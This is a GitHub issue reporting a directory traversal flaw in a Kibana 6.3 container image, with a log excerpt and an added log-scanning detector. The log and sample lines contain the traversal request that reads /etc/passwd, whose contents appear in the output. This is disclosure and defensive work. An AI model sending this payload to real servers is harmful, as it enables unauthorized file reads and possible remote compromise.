GoogleCloudPlatform / click-to-deploy

Source for Google Click to Deploy solutions listed on Google Cloud Marketplace.
Apache License 2.0

google/elastic-gke-logging/kibana contains an LFI Vulnerability #957

Closed kimattree closed 4 years ago

kimattree commented 4 years ago

Category: Container images

Type: Bug

The current version of google/elastic-gke-logging/kibana:6.3 has an LFI vulnerability allowing directory traversal attacks on underlying infrastructure. This can also lead to remote shell exploitation, as described here: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Using the current kibana image, I was able to replicate the LFI traversal attack against /etc/passwd in the pod:

```
{"type":"error","@timestamp":"2020-05-25T06:22:01Z","tags":[],"pid":1,"level":"error","error":{"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)","name":"SyntaxError","stack":"SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)\n> 1 | root:x:0:0:root:/root:/bin/bash\n | ^\n 2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n 3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin\n 4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin\n at Parser.pp$5.raise (/usr/share/kibana/node_modules/babylon/lib/index.js:4454:13)\n at Parser.pp.unexpected (/usr/share/kibana/node_modules/babylon/lib/index.js:1761:8)\n at Parser.pp.semicolon (/usr/share/kibana/node_modules/babylon/lib/index.js:1742:38)\n at Parser.pp$1.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2236:8)\n at Parser.parseExpressionStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5934:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1911:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseLabeledStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:2228:20)\n at Parser.pp$1.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:1909:17)\n at Parser.parseStatement (/usr/share/kibana/node_modules/babylon/lib/index.js:5910:22)\n at Parser.pp$1.parseBlockBody (/usr/share/kibana/node_modules/babylon/lib/index.js:2268:21)\n at Parser.pp$1.parseTopLevel (/usr/share/kibana/node_modules/babylon/lib/index.js:1778:8)\n at Parser.parse (/usr/share/kibana/node_modules/babylon/lib/index.js:1673:17)"},"url":{"protocol":null,"slashes":null,"auth":null,"host":null,"port":null,"hostname":null,"hash":null,"search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","query":{"sense_version":"@@SENSE_VERSION","apis":"../../../../../../../../etc/passwd"},"pathname":"/api/console/api_server","path":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd","href":"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"},"message":"Uncaught error: /etc/passwd: Unexpected token, expected ; (1:8)"}
Debug: internal, implementation, error
    SyntaxError: /etc/passwd: Unexpected token, expected ; (1:8)
> 1 | root:x:0:0:root:/root:/bin/bash
    |         ^
  2 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  3 | bin:x:2:2:bin:/bin:/usr/sbin/nologin
  4 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
```

The fix for this is in Elastic and Kibana versions 6.4.3.
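Log triage for the request shown in the report above, added here as an example and not part of the original issue or the project's code: it scans Kibana JSON log lines for `/api/console/api_server` requests whose `apis` value is anything other than plain names. The function names, the plain-name pattern (including the sample value `es_6_0`) and the sample lines are assumptions constructed for illustration.

```javascript
// Added example: triage Kibana JSON log lines for suspicious Console `apis` values.
// Assumption: legitimate `apis` values are comma-separated plain names such as "es_6_0".
const CONSOLE_PATH = '/api/console/api_server';
const PLAIN_NAME = /^[A-Za-z0-9_]+$/;

// Pull the `apis` value from a parsed log entry, preferring the decoded query object.
function apisParam(entry) {
  const url = entry.url || {};
  if (url.pathname !== CONSOLE_PATH) return null;
  if (url.query && typeof url.query.apis === 'string') return url.query.apis;
  return new URLSearchParams(url.search || '').get('apis');
}

// Classify one comma-separated entry; returns null when it looks like a plain API name.
function classify(name) {
  if (PLAIN_NAME.test(name)) return null;
  const segments = name.replace(/\\/g, '/').split('/');
  return segments.includes('..') ? 'path-traversal' : 'unexpected-characters';
}

// Scan raw log lines and return one finding per request with a non-plain `apis` entry.
function findSuspiciousConsoleRequests(lines) {
  const findings = [];
  for (const line of lines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; } // skip non-JSON lines ("Debug: ...")
    if (entry === null || typeof entry !== 'object') continue;
    const apis = apisParam(entry);
    if (apis === null) continue; // other route, or no `apis` parameter at all
    const reasons = apis.split(',').map(classify).filter(Boolean);
    if (reasons.length > 0) {
      findings.push({ timestamp: entry['@timestamp'], apis, reason: reasons[0], level: entry.level });
    }
  }
  return findings;
}

// Constructed sample lines, trimmed to the fields the scan reads.
const SAMPLE_LINES = [
  '{"type":"response","@timestamp":"2020-05-25T06:20:00Z","level":"info","url":{"pathname":"/api/console/api_server","query":{"sense_version":"@@SENSE_VERSION","apis":"es_6_0"}}}',
  '{"type":"error","@timestamp":"2020-05-25T06:22:01Z","level":"error","url":{"pathname":"/api/console/api_server","search":"?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../etc/passwd"}}',
  'Debug: internal, implementation, error',
  '{"type":"response","@timestamp":"2020-05-25T06:23:00Z","level":"info","url":{"pathname":"/app/kibana"}}',
];

console.log(findSuspiciousConsoleRequests(SAMPLE_LINES));
```

A finding with `level: "error"` is worth reading in full, because the parser error in the report echoed the first lines of the requested file back into the log.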

aav66 commented 4 years ago

Hello!

Thank you for your interest in our solution and for this vulnerability report. Our solution will be updated soon.